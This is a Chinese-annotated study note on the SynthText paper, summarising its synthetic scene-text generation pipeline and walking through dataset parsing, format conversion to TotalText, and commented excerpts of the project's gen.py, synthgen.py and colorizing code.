    def color_text(self, text_arr, h, bg_arr):
    """
    用于确定文本的颜色。具体而言,该方法采用以下几种方式之一来选择文本的颜色
    Decide on a color for the text:
    - could be some other random image. 从其他随机图像中选择一个颜色作为文本的颜色
    - could be a color based on the background. 根据背景选择一个颜色
    this color is sampled from a dictionary built
    from text-word images' colors. The VALUE channel
    is randomized.
    这个颜色是从建立在文本单词图像颜色上的字典中进行采样的。其中,颜色的亮度通道 (VALUE) 是随机化的

    H : minimum height of a character
    """
    # 定义变量,用于存储背景色和文本颜色
    bg_col,fg_col,i = 0,0,0
    # 从文本单词图像颜色构建的字典中采样一个颜色作为文本颜色,并将结果分别赋值给 fg_col 和 bg_col
    fg_col,bg_col = self.font_color.sample_from_data(bg_arr)
    # 创建一个 Layer 对象,将 text_arr 作为透明度 (alpha) 通道,将 fg_col 作为颜色 (color) 通道,并返回该对象以及 fg_col 和 bg_col
    return Layer(alpha=text_arr, color=fg_col), fg_col, bg_col


    def process(self, text_arr, bg_arr, min_h):
    """
    用于将文本图层 text_arr 融合到背景图像 bg_arr 上
    text_arr : one alpha mask : nxm, uint8
    bg_arr : background image: nxmx3, uint8
    min_h : height of the smallest character (px)

    return text_arr blit onto bg_arr.
    """
    # decide on a color for the text:
    # 调用 color_text 方法确定文本的颜色,并将结果的透明度通道 l_text、文本颜色 fg_col 和背景颜色 bg_col 分别赋值给变量
    l_text, fg_col, bg_col = self.color_text(text_arr, min_h, bg_arr)
    # 根据文本的透明度通道 l_text.alpha 构建一个新的图层 l_bg,其中颜色通道为 bg_col
    bg_col = np.mean(np.mean(bg_arr,axis=0),axis=0)
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'),color=bg_col)
    # 将 l_text 的透明度乘以一个随机化的权重,并将结果限制在 0.72 到 1.0 之间
    l_text.alpha = l_text.alpha * np.clip(0.88 + 0.1*np.random.randn(), 0.72, 1.0)
    layers = [l_text]
    blends = []

    # add border:
    if np.random.rand() < self.p_border:
    # 根据最小高度 min_h 确定边界的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5
    border_a = self.border(l_text.alpha, size=bsz)
    # 使用 border 方法创建一个边界图层 l_border,其中边界的透明度为 l_text.alpha,颜色为根据 l_text.color 和 l_bg.color 确定的边界颜色
    l_border = Layer(border_a, self.color_border(l_text.color,l_bg.color))
    # 将 l_border 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_border)
    blends.append('normal')

    # add shadow:
    # 如果随机数小于 p_drop_shadow(可能是一个阴影的概率):
    if np.random.rand() < self.p_drop_shadow:
    # shadow gaussian size:
    # 根据最小高度 min_h 确定阴影的大小 bsz
    if min_h <= 15 : bsz = 1
    elif 15 < min_h < 30: bsz = 3
    else: bsz = 5

    # shadow angle: 随机选择阴影的角度
    theta = np.pi/4 * np.random.choice([1,3,5,7]) + 0.5*np.random.randn()

    # shadow shift: 根据最小高度 min_h 确定阴影的偏移量 shift
    if min_h <= 15 : shift = 2
    elif 15 < min_h < 30: shift = 7+np.random.randn()
    else: shift = 15 + 3*np.random.randn()

    # opacity: 根据最小高度 min_h 确定阴影的不透明度 op
    op = 0.50 + 0.1*np.random.randn()
    # 使用 drop_shadow 方法创建一个阴影图层 l_shadow,其中阴影的透明度为 l_text.alpha,颜色为 0
    shadow = self.drop_shadow(l_text.alpha, theta, shift, 3*bsz, op)
    l_shadow = Layer(shadow, 0)
    # 将 l_shadow 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_shadow)
    blends.append('normal')

    # 创建一个新的图层 l_bg,颜色通道为 bg_arr
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_col)
    # 将 l_bg 加入 layers 列表,并将 'normal' 加入 blends 列表
    layers.append(l_bg)
    blends.append('normal')
    # 将所有图层融合成一个图层
    l_normal = self.merge_down(layers,blends)
    # now do poisson image editing: 使用泊松图像编辑算法
    l_bg = Layer(alpha=255*np.ones_like(text_arr,'uint8'), color=bg_arr)
    l_out = blit_images(l_normal.color,l_bg.color.copy())

    # plt.subplot(1,3,1)
    # plt.imshow(l_normal.color)
    # plt.subplot(1,3,2)
    # plt.imshow(l_bg.color)
    # plt.subplot(1,3,3)
    # plt.imshow(l_out)
    # plt.show()

    # 如果融合后的图像 l_out 为 None,则将最后一个图层 l_bg 替换为 l_bg,并返回最终融合后的图像颜色
    if l_out is None:
    # poisson recontruction produced
    # imperceptible text. In this case,
    # just do a normal blend:
    layers[-1] = l_bg
    return self.merge_down(layers,blends).color

    return l_out


    def check_perceptible(self, txt_mask, bg, txt_bg):
        """
        --- DEPRECATED; USE GRADIENT CHECKING IN POISSON-RECONSTRUCT INSTEAD ---

        checks if the text after merging with background
        is still visible.
        txt_mask (hxw) : binary image of text -- 255 where text is present
        0 elsewhere
        bg (hxwx3) : original background image WITHOUT any text.
        txt_bg (hxwx3) : image with text.
        """
        bgo, txto = bg.copy(), txt_bg.copy()
        txt_mask = txt_mask.astype('bool')
        bg = cv.cvtColor(bg.copy(), cv.COLOR_RGB2Lab)
        txt_bg = cv.cvtColor(txt_bg.copy(), cv.COLOR_RGB2Lab)
        bg_px = bg[txt_mask, :]
        txt_px = txt_bg[txt_mask, :]
        bg_px[:, 0] *= 100.0/255.0  # rescale - L channel
        txt_px[:, 0] *= 100.0/255.0

        diff = np.linalg.norm(bg_px - txt_px, ord=None, axis=1)
        diff = np.percentile(diff, [10, 30, 50, 70, 90])
        print("color diff percentile :", diff)
        return diff, (bgo, txto)

    def color(self, bg_arr, text_arr, hs, place_order=None, pad=20):
        """
        Return colorized text image.

        text_arr : list of (n x m) numpy text alpha mask (unit8).
        hs : list of minimum heights (scalar) of characters in each text-array.
        text_loc : [row,column] : location of text in the canvas.
        canvas_sz : size of canvas image.

        return : nxmx3 rgb colorized text-image.
        """
        # copy the input background image:
        bg_arr = bg_arr.copy()
        # promote grayscale (2D) or single-channel backgrounds to 3 channels:
        if bg_arr.ndim == 2 or bg_arr.shape[2] == 1:  # grayscale image:
            bg_arr = np.repeat(bg_arr[:, :, None], 3, 2)

        # get the canvas size:
        canvas_sz = np.array(bg_arr.shape[:2])

        # initialize the placement order:
        if place_order is None:
            place_order = np.array(range(len(text_arr)))

        rendered = []
        # process each text array:
        for i in place_order[::-1]:
            # get the "location" of the text in the image:
            # this is the minimum x and y coordinates of text:
            loc = np.where(text_arr[i])
            # min/max corners of the text region, and its extent:
            lx, ly = np.min(loc[0]), np.min(loc[1])
            mx, my = np.max(loc[0]), np.max(loc[1])
            l = np.array([lx, ly])
            m = np.array([mx, my]) - l + 1
            text_patch = text_arr[i][l[0]:l[0]+m[0], l[1]:l[1]+m[1]]

            # figure out padding:
            ext = canvas_sz - (l+m)
            num_pad = pad*np.ones(4, dtype='int32')
            num_pad[:2] = np.minimum(num_pad[:2], l)
            num_pad[2:] = np.minimum(num_pad[2:], ext)
            text_patch = np.pad(text_patch, pad_width=((num_pad[0], num_pad[2]), (num_pad[1], num_pad[3])), mode='constant')
            l -= num_pad[:2]

            w, h = text_patch.shape
            bg = bg_arr[l[0]:l[0]+w, l[1]:l[1]+h, :]

            # colorize the text patch with process():
            rdr0 = self.process(text_patch, bg, hs[i])
            rendered.append(rdr0)

            # write the colorized patch back into the background image:
            bg_arr[l[0]:l[0]+w, l[1]:l[1]+h, :] = rdr0  # rendered[-1]

            # return the final background image.
            # (Note: this return sits inside the for loop, so only one text
            # array is ever processed -- most likely an indentation slip; to
            # process all of them, the return should come after the loop.)
            return bg_arr

        return bg_arr
Resources

Original paper

Abstract

1. Proposes a dataset synthesis engine that overlays synthetic text onto existing background images in a natural way, taking the local 3D geometry of the scene into account.
2. Proposes FCRN, a new fully-convolutional regression network for text detection; it reaches an 84.2% F-score on ICDAR 2013.

1 Introduction

1. Motivates text recognition, and notes that the detection stage has become the new bottleneck: in one text recognition network, recognition accuracy on correctly cropped words is 98%, while the end-to-end F-score is only 69%.

2. Proposes a new dataset synthesis engine; the resulting dataset is called SynthText in the Wild.

3. Also proposes a text detection model - though it is pretty dated by now and probably nobody would use it anymore.

1. A review of CNN-based object detection
2. A review of synthetic datasets
3. A review of data-augmentation methods

2 Synthetic Text in the Wild

The proposed synthesis engine is:

1. Realistic
2. Automated
3. Fast

The text generation pipeline:

1. Acquire suitable text and image samples

2. Segment the image into contiguous regions based on local color and texture cues

3. Obtain a dense per-pixel depth map using a CNN

4. Estimate a local surface normal for each contiguous region

5. Pick a color for the text (and, optionally, for its outline) based on the region's color

6. Render the text sample with a randomly selected font and transform it according to the local surface orientation (a toy perspective-warp sketch follows the figure caption below)

7. Blend the text into the scene using Poisson image editing


(Top, left to right):
(1) The RGB input image with no text instances.
(2) The predicted dense depth map (darker regions are closer).
(3) The color and texture gPb-UCM segmentation.
(4) Filtered regions: regions suitable for text are randomly colorized; unsuitable ones keep their original image pixels.
(Bottom): four synthesized scene-text images with axis-aligned word-level bounding-box annotations.
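To make step 6 concrete, here is a tiny, self-contained sketch of warping a rendered text mask with a homography. The corner coordinates are made-up values standing in for the region's estimated orientation, not anything computed by the paper's engine:

import numpy as np
import cv2

# render a toy "text" mask
mask = np.zeros((60, 200), np.uint8)
cv2.putText(mask, 'SynthText', (5, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, 255, 2)

# map the mask's corners onto an arbitrary tilted quadrilateral
# (in the real pipeline the target quad comes from the fitted plane)
src = np.float32([[0, 0], [200, 0], [200, 60], [0, 60]])
dst = np.float32([[20, 10], [180, 0], [200, 70], [0, 55]])
H = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(mask, H, (220, 80))
print(warped.shape)  # (80, 220)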

2.1. Text and Image Sources

• Text: words, lines and paragraphs are sampled from the Newsgroups20 dataset.

• For diversity, 8,000 images were collected from Google Image Search; images containing text were discarded after manual inspection.

    2.2. Segmentation and Geometry Estimation


Placement is sensitive to local color/texture.
(Left) A sample image from the synthetic text dataset. Note how the text is confined to the steps on the street.
(Right) By contrast, the text placement in this image ignores such local region cues.
• In real images, text tends to be contained in well-defined regions (e.g. a sign). We approximate this constraint by requiring text to be contained in regions characterized by uniform color and texture; the regions are obtained by thresholding the gPb-UCM contour hierarchy at 0.11.
• In natural images, text tends to be painted on top of surfaces (e.g. a sign or a cup). To approximate a similar effect in the synthetic data, the text is perspective-transformed according to the local surface normal. The normals are estimated automatically by first predicting a dense depth map for the segmented regions with a CNN and then fitting a planar facet to it with RANSAC (a minimal plane-fitting sketch follows this list).
• The text is aligned to the estimated region orientation as follows:
  • First, the image-region contour is warped to a fronto-parallel view using the estimated plane normal;
  • then, a rectangle is fitted to this fronto-parallel region;
  • finally, the text is aligned to the larger side ("width") of this rectangle.
  • When placing multiple text instances in the same region, the text masks are checked for collisions to avoid placing them on top of one another.
• Not all segmented regions are suitable for text placement - a region should not be too small, have an extreme aspect ratio, or have a surface normal orthogonal to the viewing direction; all such regions are filtered out at this stage. Regions with too much texture are also filtered out, where the degree of texture is measured by the strength of third-order derivatives in the RGB image.

• An alternative to estimating depth with a CNN is to use RGBD image datasets, but that is an error-prone route. We prefer an imperfect estimated depth map because:

  • it essentially allows background images of any scene type, not just those with available RGBD data,

  • and because the publicly available RGBD datasets all have strong limitations.
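A minimal, self-contained RANSAC plane-fitting sketch on synthetic points (the repository's actual fitting lives in synth_utils.py's isplanar; the trial count and distance threshold here are illustrative):

import numpy as np

rng = np.random.default_rng(0)
# 300 points near the plane z = 0.2x + 0.1y + 1, with 30 outliers
xy = rng.uniform(-1, 1, (300, 2))
z = 0.2*xy[:, 0] + 0.1*xy[:, 1] + 1 + 0.01*rng.standard_normal(300)
pts = np.c_[xy, z]
pts[:30, 2] += rng.uniform(0.5, 2.0, 30)

best_n, best_inliers = None, 0
for _ in range(100):  # cf. ransac_fit_trials in TextRegions below
    sample = pts[rng.choice(len(pts), 3, replace=False)]
    n = np.cross(sample[1] - sample[0], sample[2] - sample[0])
    if np.linalg.norm(n) < 1e-9:
        continue  # degenerate (collinear) sample
    n /= np.linalg.norm(n)
    dist = np.abs((pts - sample[0]) @ n)  # point-to-plane distances
    inliers = int(np.sum(dist < 0.05))    # cf. dist_thresh
    if inliers > best_inliers:
        best_inliers, best_n = inliers, n
print(best_n, best_inliers)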

2.3. Text Rendering and Image Composition

• Once the location and orientation of the text have been decided, the text is assigned a color. The color palette for text is learned from cropped word images in the IIIT5K word dataset. Pixels in each cropped word image are partitioned into two groups using K-means, yielding a color pair, with one color approximating the foreground (text) color and the other the background color. When rendering new text, the color pair whose background color best matches the target image region (by L2 norm in Lab color space) is chosen, and the corresponding foreground color is used to render the text (a self-contained K-means sketch follows this list).

• About 20% of text instances are randomly chosen to have a border. The border color is chosen either as the foreground color with its value channel increased or decreased, or as the mean of the foreground and background colors.

• To preserve the illumination gradients in the synthetic text image, the text is blended onto the base image with Poisson image editing.
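A minimal sketch of the color-pair idea: cluster the pixels of a (here synthetic) word image into two groups with K-means and treat the cluster centers as the (foreground, background) colors. This is an illustration, not the paper's exact learning code:

import numpy as np
import cv2

# fake "cropped word image": dark text-ish pixels on a light background
img = np.full((32, 96, 3), 210, np.uint8)
img[10:22, 8:88] = (40, 35, 30)

pixels = img.reshape(-1, 3).astype(np.float32)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
_, labels, centers = cv2.kmeans(pixels, 2, None, criteria, 3,
                                cv2.KMEANS_PP_CENTERS)
# the smaller cluster is (usually) the text, the larger one the background
counts = np.bincount(labels.ravel())
fg, bg = centers[np.argmin(counts)], centers[np.argmax(counts)]
print("foreground ~", fg.astype(int), "background ~", bg.astype(int))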

3. A Fast Text Detection Network

3.1. Architecture

Skipping this part.

4. Evaluation

4.1. Datasets

• SynthText in the Wild
• ICDAR Datasets
• Street View Text

4.2. Text Localisation Experiments

Works well.

4.3. Synthetic Dataset Evaluation

Three synthetic training datasets of increasing complexity were generated:

1. Text placed at random positions in the image
2. Text constrained to local color and texture boundaries
3. Text perspective-distorted to match the local scene depth (while also respecting the local color and texture boundaries of (2))

All other aspects of the datasets are held fixed - e.g. the text lexicon, the background images, and the color distributions.

4.4. End-to-End Text Spotting

Performance on end-to-end text spotting.

4.5. Timings

Nicely fast!

5. Conclusion

The designed model underperforms when trained only on existing datasets, but does very well with the help of the synthetic dataset.

A. Appendix

    A.1. Variation in Fonts, Colors and Sizes


The figure below shows synthetic renderings of the same text, "vamos!".

Along each row, the text is rendered at roughly the same location on the same background image, but with varying fonts, colors and sizes.

    A.2. Poisson Editing vs. Alpha Blending


A comparison of simple alpha blending (bottom row) and Poisson editing (top row).

Poisson editing preserves local illumination gradients and texture detail.

    A.3. SynthText in the Wild


These images show text instances in different fonts, colors and sizes, with borders and shadows, on varied backgrounds, transformed according to the local geometry and constrained to locally contiguous regions of color and texture. Ground-truth bounding boxes are marked in red.

    A.4. ICDAR 2013 Detections


Example detections on the ICDAR 2013 dataset from "FCRNall + multi-filt" (top row) and from Jaderberg et al. (bottom row). Precision, recall and F-measure (P / R / F) are shown at the top of each image.

    A.5. Street View Text (SVT) Detections


Example detections on the Street View Text (SVT) dataset from "FCRNall + multi-filt" (top row) and from Jaderberg et al. (bottom row).

Precision, recall and F-measure (P / R / F) are shown at the top of each image: both methods reach a precision of 1 on these images (except for one case caused by missing ground-truth annotations).

Parsing the dataset

Download SynthText.zip from Synthetic Data for Text Localisation in Natural Images - Academic Torrents and unzip it:


Each folder inside contains one scene with a number of images; gt.mat holds the annotations for those images.

For a detailed breakdown of gt.mat, see: SynthText文本数据详细解析_synthtext数据集_Mr.Q的博客-CSDN博客

Reading gt.mat with Python:

import scipy.io as sio

# read the MAT file
data = sio.loadmat(r'D:\dataset\SynthText\SynthText\gt.mat')

It contains the following fields:

• imnames: image paths
• txt: the text strings
• wordBB: word-level bounding boxes
• charBB: character-level bounding boxes
    len(data['imnames'][0]), len(data['txt'][0]), len(data['wordBB'][0]), len(data['charBB'][0])
    (858750, 858750, 858750, 858750)
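For a single sample, the box arrays are 2 × 4 × N (x/y coordinates × 4 corners × N boxes); when there is only one box, loadmat may squeeze the last axis away, which is exactly why the visualization code below branches on isinstance(..., np.ndarray):

idx = 0
print(data['imnames'][0][idx][0])    # relative image path
print(data['wordBB'][0][idx].shape)  # e.g. (2, 4, n_words)
print(data['charBB'][0][idx].shape)  # e.g. (2, 4, n_chars)
print(data['txt'][0][idx])           # the text for this image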

Visualizing the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 92

file_dir = r'D:/dataset/SynthText/SynthText/'

image_path = os.path.join(file_dir, data['imnames'][0][index][0])

image_origin = cv2.imread(image_path)
image_bbox = image_origin.copy()
image_cbox = image_origin.copy()
height, width, _ = image_origin.shape


txt = []
for element in list(data['txt'][0][index]):
    txt.extend(element.split())

if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])):  # bbox
        x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
        y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
        points = np.array([x, y], np.int32).T
        transcriptions = txt[i]

        cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

        cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))
else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

if isinstance(data['charBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['charBB'][0][index][0][0])):  # cbox
        x = [int(num) for num in data['charBB'][0][index][0][:, i]]
        y = [int(num) for num in data['charBB'][0][index][1][:, i]]
        points = np.array([x, y], np.int32).T

        cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
else:
    x = [int(num) for num in data['charBB'][0][index][0]]
    y = [int(num) for num in data['charBB'][0][index][1]]
    points = np.array([x, y], np.int32).T

    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin: ' + data['imnames'][0][index][0])

axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('bbox')

axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
axes[2].axis('off')
axes[2].set_title('cbox')

plt.tight_layout()
plt.show()


Converting to the TotalText format readable by MindOCR

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np
import shutil
from tqdm import tqdm

file_dir = r'D:/dataset/SynthText/SynthText/'
save_image_dir = r'D:/dataset/SynthText/SynthText/images'
save_label_dir = r'D:/dataset/SynthText/SynthText/Txts'

for index in tqdm(range(858750)):
    image_path = os.path.join(file_dir, data['imnames'][0][index][0])
    shutil.copy(image_path, os.path.join(save_image_dir, 'img' + str(index) + '.jpg'))

    string = ""
    txt = []
    for element in list(data['txt'][0][index]):
        txt.extend(element.split())

    # indentation reconstructed: one annotation line must be appended per
    # word box, i.e. inside the loop in the multi-box case
    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
        for i in range(len(data['wordBB'][0][index][0][0])):  # bbox
            x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
            y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
            points = np.array([x, y], np.int32).T
            transcriptions = txt[i]

            string += 'x: [['
            string += ' '.join(map(str, x))
            string += ']], y: [['
            string += ' '.join(map(str, y))
            string += "]], ornt: [u'h"
            string += "'], transcriptions: [u'"
            string += transcriptions
            string += "']\n"
    else:
        x = [int(num) for num in data['wordBB'][0][index][0]]
        y = [int(num) for num in data['wordBB'][0][index][1]]
        points = np.array([x, y], np.int32).T
        transcriptions = txt[0]

        string += 'x: [['
        string += ' '.join(map(str, x))
        string += ']], y: [['
        string += ' '.join(map(str, y))
        string += "]], ornt: [u'h"
        string += "'], transcriptions: [u'"
        string += transcriptions
        string += "']\n"

    # fix: the original snippet wrote to an undefined `save_dir`; the labels
    # belong in save_label_dir defined above
    with open(os.path.join(save_label_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
        file.write(string)
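Each resulting poly_gt_imgN.txt then holds one TotalText-style line per word box, e.g. (the values here are illustrative):

x: [[12 85 85 12]], y: [[30 30 55 55]], ornt: [u'h'], transcriptions: [u'hello']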

Code

Grab the code from ankush-me/SynthText at python3 (github.com) and run it under WSL2; set up the environment by fixing issues as they come up - it always runs in the end.

Generate images:

    python gen.py --viz

Visualize the results:

    python visualize_results.py


    image name        :  hiking_125.jpg_0
    ** no. of chars : 69
    ** no. of words : 15
    ** text : ['>>Potvin' 'someone\n wrong \ngetting' 'cloud' 'do with' 'Calgary\nfinal'
    'Re:' 'I have' 'a stud\nMorgan']

Reading the code (there is a lot of it, so only selected parts)

    gen.py

import numpy as np
import h5py                 # read/write HDF5 data files
import os, sys, traceback   # file/system operations and exception handling
import os.path as osp       # path handling
from synthgen import *      # functions and classes for synthetic text rendering
from common import *        # shared helper functions and constants
import wget, tarfile        # downloading and unpacking the data


# Define some configuration variables:
NUM_IMG = -1            # no. of images to use for generation (-1 to use all available)
INSTANCE_PER_IMAGE = 1  # no. of times to use the same image
SECS_PER_IMG = 5        # max time per image in seconds

# path to the data-file, containing image, depth and segmentation:
DATA_PATH = 'data'
DB_FNAME = osp.join(DATA_PATH, 'dset.h5')  # full path of the database file
# url of the data (google-drive public file):
DATA_URL = 'http://www.robots.ox.ac.uk/~ankush/data.tar.gz'
OUT_FILE = 'results/SynthText.h5'  # output file path

def get_data():
    """
    Download the image, depth and segmentation data.
    Returns the h5 database.
    """
    # if the h5 file does not exist yet, download and unpack the data:
    if not osp.exists(DB_FNAME):
        try:
            # print the download URL and file size:
            colorprint(Color.BLUE, '\tdownloading data (56 M) from: '+DATA_URL, bold=True)
            print()
            sys.stdout.flush()
            # download the archive as "data.tar.gz" with wget.download():
            out_fname = 'data.tar.gz'
            wget.download(DATA_URL, out=out_fname)
            # open and extract the tar archive:
            tar = tarfile.open(out_fname)
            tar.extractall()
            # close the archive and remove "data.tar.gz":
            tar.close()
            os.remove(out_fname)
            # print where the data was saved:
            colorprint(Color.BLUE, '\n\tdata saved at:'+DB_FNAME, bold=True)
            sys.stdout.flush()
        except:  # download failed: report the error and exit
            print(colorize(Color.RED, 'Data not found and have problems downloading.', bold=True))
            sys.stdout.flush()
            sys.exit(-1)
    # open the h5 file and return it (read-only):
    return h5py.File(DB_FNAME, 'r')


def add_res_to_db(imgname, res, db):
    """
    Add the synthetically generated text image instance
    and other metadata to the dataset.
    :param imgname: image name
    :param res: generated synthetic text image instances
    :param db: database object
    """
    ninstance = len(res)  # number of generated instances
    for i in range(ninstance):
        # create a dataset holding the synthesized image; its name combines
        # the image name and the instance index (dname):
        dname = "%s_%d" % (imgname, i)
        db['data'].create_dataset(dname, data=res[i]['img'])
        # store the character (charBB) and word (wordBB) boxes as attributes:
        db['data'][dname].attrs['charBB'] = res[i]['charBB']
        db['data'][dname].attrs['wordBB'] = res[i]['wordBB']
        # db['data'][dname].attrs['txt'] = res[i]['txt']
        L = res[i]['txt']
        L = [n.encode("ascii", "ignore") for n in L]
        db['data'][dname].attrs['txt'] = L


def main(viz=False):
    # open databases:
    print(colorize(Color.BLUE, 'getting data..', bold=True))
    db = get_data()
    print(colorize(Color.BLUE, '\t-> done', bold=True))

    # open the output h5 file:
    out_db = h5py.File(OUT_FILE, 'w')
    out_db.create_group('/data')
    print(colorize(Color.GREEN, 'Storing the output in: '+OUT_FILE, bold=True))

    # get the names of the image files in the dataset:
    imnames = sorted(db['image'].keys())
    N = len(imnames)
    global NUM_IMG
    if NUM_IMG < 0:  # -1 means use all available images
        NUM_IMG = N
    start_idx, end_idx = 0, min(NUM_IMG, N)  # start and end indices

    RV3 = RendererV3(DATA_PATH, max_time=SECS_PER_IMG)
    for i in range(start_idx, end_idx):  # loop over the images
        imname = imnames[i]
        try:
            # get the image:
            img = Image.fromarray(db['image'][imname][:])
            # get the pre-computed depth:
            # there are 2 estimates of depth (represented as 2 "channels")
            # here we are using the second one (in some cases it might be
            # useful to use the other one):
            depth = db['depth'][imname][:].T
            depth = depth[:, :, 1]
            # get segmentation:
            seg = db['seg'][imname][:].astype('float32')
            area = db['seg'][imname].attrs['area']
            label = db['seg'][imname].attrs['label']

            # re-size uniformly:
            sz = depth.shape[:2][::-1]
            img = np.array(img.resize(sz, Image.ANTIALIAS))
            seg = np.array(Image.fromarray(seg).resize(sz, Image.NEAREST))

            print(colorize(Color.RED, '%d of %d' % (i, end_idx-1), bold=True))
            # render text onto the image with RendererV3, then add the result
            # and its metadata to the output database:
            res = RV3.render_text(img, depth, seg, area, label,
                                  ninstance=INSTANCE_PER_IMAGE, viz=viz)
            if len(res) > 0:
                # non-empty : successful in placing text:
                add_res_to_db(imname, res, out_db)
            # visualize the output:
            if viz:
                if 'q' in input(colorize(Color.RED, 'continue? (enter to continue, q to exit): ', True)):
                    break
        except:
            traceback.print_exc()
            print(colorize(Color.GREEN, '>>>> CONTINUING....', bold=True))
            continue
    db.close()
    out_db.close()


if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Generate Synthetic Scene-Text Images')
    parser.add_argument('--viz', action='store_true', dest='viz', default=False, help='flag for turning on visualizations')
    args = parser.parse_args()
    main(args.viz)
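Based on how main() reads the database above ('image', 'depth' and 'seg' groups keyed by image name, with 'area' and 'label' attributes on the segmentations), a quick structural check of dset.h5 might look like this:

import h5py

with h5py.File('data/dset.h5', 'r') as db:
    print(list(db.keys()))              # expect ['depth', 'image', 'seg']
    name = sorted(db['image'].keys())[0]
    print(name, db['image'][name].shape, db['depth'][name].shape)
    print(dict(db['seg'][name].attrs))  # 'area' and 'label'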

    synthgen.py

    Main script for synthetic text rendering.

    from __future__ import division
    import copy
    import cv2
    import h5py
    from PIL import Image
    import numpy as np
    #import mayavi.mlab as mym
    import matplotlib.pyplot as plt
    import os.path as osp
    import scipy.ndimage as sim
    import scipy.spatial.distance as ssd
    import synth_utils as su
    import text_utils as tu
    from colorize3_poisson import Colorize
    from common import *
    import traceback, itertools

    class TextRegions()

class TextRegions(object):
    """
    Get regions from segmentation which are good for placing
    text.
    """
    # a region is viable only if its width >= minWidth and height >= minHeight:
    minWidth = 30   # px
    minHeight = 30  # px
    # ...and only if its aspect ratio lies between minAspect and maxAspect:
    minAspect = 0.3  # w > 0.3*h
    maxAspect = 7
    # ...and only if it covers at least minArea pixels:
    minArea = 100  # number of pix
    # ...and fills at least 60% of its minimum-area bounding rectangle:
    pArea = 0.60  # area_obj/area_minrect >= 0.6

    # RANSAC planar fitting params:
    # distance threshold: a point counts as an inlier if it is closer than
    # dist_thresh to the fitted plane
    dist_thresh = 0.10  # m
    # minimum number of inliers; the fit fails below num_inlier
    num_inlier = 90
    # number of RANSAC iterations; each iteration fits a plane to a random sample
    ransac_fit_trials = 100
    # minimum z-component of the plane normal; planes below min_z_projection
    # are treated as orthogonal to the viewing direction and hence unusable
    min_z_projection = 0.25
    # minimum width of a rectified text region for it to be kept
    minW = 20

    @staticmethod
    def filter_rectified(mask):
        """
        Keep a rectified region only if both its width and height reach
        TextRegions.minW. The input is a binary image: "1" inside the
        region, "0" for background.
        mask : 1 where "ON", 0 where "OFF"
        """
        # project the region onto the vertical/horizontal axes, take medians:
        wx = np.median(np.sum(mask, axis=0))
        wy = np.median(np.sum(mask, axis=1))
        # keep the region if both medians reach TextRegions.minW:
        return wx > TextRegions.minW and wy > TextRegions.minW

    @staticmethod
    def get_hw(pt, return_rot=False):
        # compute the width and height of the rotation-rectified region
        pt = pt.copy()
        # unrotate2d estimates the principal-axis angle and yields the
        # rotation that brings the region back to the horizontal:
        R = su.unrotate2d(pt)
        # subtract the coordinate median mu to center the region at the origin:
        mu = np.median(pt, axis=0)
        # apply the rotation R, then move the center back:
        pt = (pt-mu[None, :]).dot(R.T) + mu[None, :]
        # width/height of the rectified region = coordinate range per axis:
        h, w = np.max(pt, axis=0) - np.min(pt, axis=0)
        if return_rot:
            # optionally also return the rotation matrix R:
            return h, w, R
        return h, w

    @staticmethod
    def filter(seg, area, label):
        """
        Apply the filter.
        The final list is ranked by area.
        :seg: segmentation image
        :area: region areas
        :label: region labels
        """
        # drop regions smaller than TextRegions.minArea; update good and area:
        good = label[area > TextRegions.minArea]
        area = area[area > TextRegions.minArea]
        filt, R = [], []
        for idx, i in enumerate(good):
            # binary mask for region label i:
            mask = seg == i
            # coordinates of the non-zero mask pixels:
            xs, ys = np.where(mask)
            # as a float32 array:
            coords = np.c_[xs, ys].astype('float32')
            # minimum-area bounding rectangle:
            rect = cv2.minAreaRect(coords)
